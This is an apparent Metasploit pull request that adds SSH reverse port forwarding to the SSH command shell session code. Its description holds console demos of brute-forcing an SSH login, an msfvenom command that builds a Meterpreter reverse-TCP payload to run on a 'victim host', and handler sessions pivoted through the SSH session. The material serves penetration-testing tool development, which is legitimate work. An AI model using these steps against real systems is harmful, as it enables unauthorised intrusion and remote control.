### PR TITLE
SSH reverse port forwarding

### DIFF
--- a/lib/msf/base/sessions/ssh_command_shell_bind.rb
+++ b/lib/msf/base/sessions/ssh_command_shell_bind.rb
@@ -285,6 +285,7 @@ module Msf::Sessions
           else
               elog("Remote forwarding failed on #{params.localhost}:#{params.localport}")
           end
+          condition.signal
         }
       end
 

--- a/lib/msf/base/sessions/ssh_command_shell_bind.rb
+++ b/lib/msf/base/sessions/ssh_command_shell_bind.rb
@@ -142,6 +142,8 @@ module Msf::Sessions
     # Will receive connection messages back from the SSH server,
     # whereupon a TcpClientChannel will be opened
     class TcpServerChannel
+      include Rex::IO::StreamServer
+
       def initialize(params, client, host, port)
         @params = params
         @client = client

--- a/lib/msf/base/sessions/ssh_command_shell_bind.rb
+++ b/lib/msf/base/sessions/ssh_command_shell_bind.rb
@@ -175,8 +175,13 @@ module Msf::Sessions
         end
       end
 
-      def create(cid, ssh_channel)
-        channel = TcpClientChannel.new(@client, cid, ssh_channel, @params)
+      def create(cid, ssh_channel, peer_host, peer_port)
+        peer_info = {
+          'PeerHost' => peer_host,
+          'PeerPort' => peer_port,
+        }
+        params = @params.merge(peer_info)
+        channel = TcpClientChannel.new(@client, cid, ssh_channel, params)
         @channels.enq(channel)
       end
 
@@ -290,7 +295,7 @@ module Msf::Sessions
         if success
           key = [host, port]
           @server_channels.delete(key)
-          print_status("Reverse listener deleted")
+          print_status("Reverse SSH listener on #{host}:#{port} stopped")
         else
           print_error("Could not stop reverse listener on #{host}:#{port}")
         end
@@ -369,7 +374,7 @@ module Msf::Sessions
       #
       key = [connected_address, connected_port]
       server_channel = @server_channels[key]
-      server_channel.create(@channel_ticker += 1, channel)
+      server_channel.create(@channel_ticker += 1, channel, originator_address, originator_port)
     end
 
     def cleanup

--- a/lib/msf/base/sessions/ssh_command_shell_bind.rb
+++ b/lib/msf/base/sessions/ssh_command_shell_bind.rb
@@ -138,6 +138,59 @@ module Msf::Sessions
       attr_reader :cid, :client, :params
     end
 
+    class TcpServerChannel
+      def initialize(params, client, host, port)
+        @params = params
+        @client = client
+        @host = host
+        @port = port
+        @channels = Queue.new
+      end
+
+      def accept(opts = {})
+        timeout = opts['Timeout']
+        if (timeout.nil? || timeout <= 0)
+          timeout = 0
+        end
+
+        result = nil
+        begin
+          ::Timeout.timeout(timeout) {
+            result = _accept
+          }
+        rescue Timeout::Error
+        end
+
+        result
+      end
+
+      def close
+        @client.stop_server_channel(@host, @port)
+      end
+
+      def create(cid, ssh_channel)
+        channel = TcpClientChannel.new(@client, cid, ssh_channel, @params)
+        @channels.enq(channel)
+      end
+
+    protected
+
+      def _accept(nonblock = false)
+        result = nil
+        begin
+        channel = @channels.deq(nonblock)
+        if channel
+          result = channel.lsock
+        end
+        rescue ThreadError
+          # This happens when there are no clients in the queue
+        end
+        result
+      end
+
+
+    end
+
     #
     # Create a sessions instance from an SshConnection. This will handle creating
     # a new command stream.
@@ -148,11 +201,15 @@ module Msf::Sessions
     def initialize(ssh_connection, opts = {})
       @ssh_connection = ssh_connection
       @sock = ssh_connection.transport.socket
+      @server_channels = {}
 
       initialize_channels
       @channel_ticker = 0
 
       rstream = Net::SSH::CommandStream.new(ssh_connection).lsock
+
+      # Be alerted to reverse port forward connections (once we start listening on a port)
+      ssh_connection.on_open_channel('forwarded-tcpip', &method(:on_got_remote_connection))
       super(rstream, opts)
     end
 
@@ -172,29 +229,79 @@ module Msf::Sessions
       # Notify handlers before we create the socket
       notify_before_socket_create(self, params)
 
-      mutex = Mutex.new
-      condition = ConditionVariable.new
       ssh_channel = msf_channel = nil
-      opened = false
 
       if params.proto == 'tcp'
-        if params.server
-          raise ::Rex::BindFailed.new(params.localhost, params.localport, reason: 'TCP server sockets are not supported by SSH sessions.')
-        end
-
-        ssh_channel = @ssh_connection.open_channel('direct-tcpip', :string, params.peerhost, :long, params.peerport, :string, params.localhost, :long, params.localport) do |_|
-          dlog("new direct-tcpip channel opened to #{Rex::Socket.is_ipv6?(params.peerhost) ? '[' + params.peerhost + ']' : params.peerhost}:#{params.peerport}")
-          opened = true
-          mutex.synchronize do
-            condition.signal
+          if params.server
+            sock = create_server_channel(params)
+          else
+            sock = create_client_channel(params)
           end
-        end
       elsif params.proto == 'udp'
         raise ::Rex::ConnectionError.new(params.peerhost, params.peerport, reason: 'UDP sockets are not supported by SSH sessions.')
       end
 
-      raise ::Rex::ConnectionError if ssh_channel.nil?
+      raise ::Rex::ConnectionError unless sock
 
+      # Notify now that we've created the socket
+      notify_socket_created(self, sock, params)
+
+      sock
+    end
+
+    def create_server_channel(params)
+      keep_trying = true
+      msf_channel = nil
+      @ssh_connection.send_global_request('tcpip-forward', :string, params.localhost, :long, params.localport) do |success, response|
+        if success
+          remote_port = params.localport
+          remote_port = response.read_long if remote_port == 0
+          dlog("Remote forwarding from #{params.localhost} established on port #{remote_port}")
+          key = [params.localhost, remote_port]
+          msf_channel = TcpServerChannel.new(params, self, params.localhost, remote_port)
+          @server_channels[key] = msf_channel
+        else
+          print_error("Remote forwarding failed on #{params.localhost}:#{params.localport}")
+        end
+        keep_trying = false
+      end
+      @ssh_connection.loop(params.timeout) {
+        keep_trying
+      }
+
+      # Return the server channel itself
+      sock = msf_channel
+    end
+
+    def stop_server_channel(host, port)
+      keep_trying = true
+      @ssh_connection.send_global_request("cancel-tcpip-forward", :string, host, :long, port) do |success, response|
+        if success
+          key = [host, port]
+          @server_channels.delete(key)
+          keep_trying = false
+        else
+          keep_trying = false
+          raise Rex::ConnectionError, "Could not stop reverse listener on #{host}:#{port}"
+        end
+      end
+      timeout = 5 # seconds
+      @ssh_connection.loop(timeout) {
+        keep_trying
+      }
+    end
+
+    def create_client_channel(params)
+      mutex = Mutex.new
+      condition = ConditionVariable.new
+      opened = false
+      ssh_channel = @ssh_connection.open_channel('direct-tcpip', :string, params.peerhost, :long, params.peerport, :string, params.localhost, :long, params.localport) do |_|
+        dlog("new direct-tcpip channel opened to #{Rex::Socket.is_ipv6?(params.peerhost) ? '[' + params.peerhost + ']' : params.peerhost}:#{params.peerport}")
+        opened = true
+        mutex.synchronize do
+          condition.signal
+        end
+      end
       failure_reason_code = nil
       ssh_channel.on_open_failed do |_ch, code, desc|
         failure_reason_code = code
@@ -225,7 +332,6 @@ module Msf::Sessions
 
         raise ::Rex::ConnectionError.new(params.peerhost, params.peerport, reason: reason)
       end
-
       msf_channel = TcpClientChannel.new(self, @channel_ticker += 1, ssh_channel, params)
       sock = msf_channel.lsock
 
@@ -235,8 +341,24 @@ module Msf::Sessions
       sock
     end
 
+    # The SSH server has told us that there's a port forwarding request.
+    # Find the relevant server channel and inform it.
+    def on_got_remote_connection(session, channel, packet)
+      connected_address = packet.read_string
+      connected_port = packet.read_long
+      originator_address = packet.read_string
+      originator_port = packet.read_long
+      ilog("Received connection: #{connected_address}:#{connected_port} <--> #{originator_address}:#{originator_port}")
+      # Find the correct TcpServerChannel
+      #
+      key = [connected_address, connected_port]
+      server_channel = @server_channels[key]
+      server_channel.create(channel)
+    end
+
     def cleanup
       channels.each_value(&:close)
+      server_channels.each_value(&:cleanup)
 
       super
     end

--- a/lib/msf/base/sessions/ssh_command_shell_bind.rb
+++ b/lib/msf/base/sessions/ssh_command_shell_bind.rb
@@ -274,7 +274,7 @@ module Msf::Sessions
           msf_channel = TcpServerChannel.new(params, self, params.localhost, remote_port)
           @server_channels[key] = msf_channel
         else
-          print_error("Remote forwarding failed on #{params.localhost}:#{params.localport}")
+          elog("Remote forwarding failed on #{params.localhost}:#{params.localport}")
         end
         completed_event.set
       end
@@ -296,9 +296,9 @@ module Msf::Sessions
         if success
           key = [host, port]
           @server_channels.delete(key)
-          print_status("Reverse SSH listener on #{host}:#{port} stopped")
+          ilog("Reverse SSH listener on #{host}:#{port} stopped")
         else
-          print_error("Could not stop reverse listener on #{host}:#{port}")
+          elog("Could not stop reverse listener on #{host}:#{port}")
         end
         completed_event.set
       end


### PR DESCRIPTION
Implements reverse port forwarding from within the command shell created by the `auxiliary/scanner/ssh/ssh_login` module. This applies when using metasploit's routing table, or forcibly creating a reverse listener via an existing SSH session.

## Verification

On the metasploit host:

- [x] Start `msfconsole`
- [x] `use auxiliary/scanner/ssh/ssh_login`
- [x] `set rhost 192.168.1.2`
- [x] `set username user`
- [x] `set password password123`
- [x] `run`
- [x] `use exploit/multi/handler`
- [x] `set payload linux/x64/meterpreter_reverse_tcp`
- [x] `set reverselistenercomm 1` OR `route add 0 0 1`
- [x] `set lhost 0.0.0.0`
- [x] `set lport 5555`
- [x] `run`

Then, on the victim host, run a payload created with the following command line:

`./msfvenom -f elf -p linux/x64/meterpreter_reverse_tcp lhost=127.0.0.1 lport=5555`

Should also work with:

- [ ] `auxiliary/scanner/ssh/ssh_login_pubkey` module.
- [ ] Running as a job with `set exitonsession false`

These code changes did touch the existing forwards-direction port forwardings, so worthwhile verifying that too.

## Demo

```
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set rhost 192.168.1.2
rhost => 192.168.1.2
msf6 auxiliary(scanner/ssh/ssh_login) > set username user
username => user
msf6 auxiliary(scanner/ssh/ssh_login) > set password password123
password => password123
msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 192.168.1.2:22 - Starting bruteforce
[+] 192.168.1.2:22 - Success: 'user:password123' 'uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),117(bluetooth),133(scanner) Linux kali 5.7.0-kali1-amd64 #1 SMP Debian 5.7.6-1kali2 (2020-07-01) x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.1.1:39437 -> 192.168.1.2:22) at 2021-09-16 20:49:02 +1000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) >  set payload linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) >  set reverselistenercomm 1
reverselistenercomm => 1
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) >  set lport 5555
lport => 5555
msf6 exploit(multi/handler) >  run

[*] Started reverse TCP handler on 0.0.0.0:5555 via the shell on session 1
[*] Meterpreter session 2 opened (0.0.0.0:5555 -> 127.0.0.1:42222) at 2021-09-16 20:49:51 +1000
[*] Reverse SSH listener on 0.0.0.0:5555 stopped

meterpreter >
```

As a job, running the second payload twice:

```
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set rhost 192.168.1.2
rhost => 192.168.1.2
msf6 auxiliary(scanner/ssh/ssh_login) > set username user
username => user
msf6 auxiliary(scanner/ssh/ssh_login) > set password password123
password => password123
msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 192.168.1.2:22 - Starting bruteforce
[+] 192.168.1.2:22 - Success: 'user:password123' 'uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),117(bluetooth),133(scanner) Linux kali 5.7.0-kali1-amd64 #1 SMP Debian 5.7.6-1kali2 (2020-07-01) x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.1.1:45251 -> 192.168.1.2:22) at 2021-09-16 21:05:11 +1000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set reverselistenercomm 1
reverselistenercomm => 1
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > set exitonsession false
exitonsession => false
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) > 
[*] Started reverse TCP handler on 0.0.0.0:5555 via the shell on session 1
[*] Meterpreter session 2 opened (0.0.0.0:5555 -> 127.0.0.1:43166) at 2021-09-16 21:05:30 +1000

msf6 exploit(multi/handler) > [*] Meterpreter session 3 opened (0.0.0.0:5555 -> 127.0.0.1:43178) at 2021-09-16 21:05:40 +1000

msf6 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                   Information                                                    Connection
  --  ----  ----                   -----------                                                    ----------
  1         shell linux            SSH user:password123 (192.168.1.2:22)                          192.168.1.1:45251 -> 192.168.1.2:22 (192.168.1.2)
  2         meterpreter x64/linux  user @ kali (uid=1000, gid=1000, euid=1000, egid=1000) @ kali  0.0.0.0:5555 -> 127.0.0.1:43166 (127.0.0.1)
  3         meterpreter x64/linux  user @ kali (uid=1000, gid=1000, euid=1000, egid=1000) @ kali  0.0.0.0:5555 -> 127.0.0.1:43178 (127.0.0.1)

msf6 exploit(multi/handler) > jobs -K
Stopping all jobs...

[*] Reverse SSH listener on 0.0.0.0:5555 stopped
```

Existing forward behaviour (using the same SSH session):

```
msf6 exploit(multi/handler) > set payload linux/x64/shell_bind_tcp
payload => linux/x64/shell_bind_tcp
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 127.0.0.1:6666
[*] Command shell session 3 opened (0.0.0.0:0 -> 127.0.0.1:6666) at 2021-09-16 20:55:50 +1000

whoami
user
```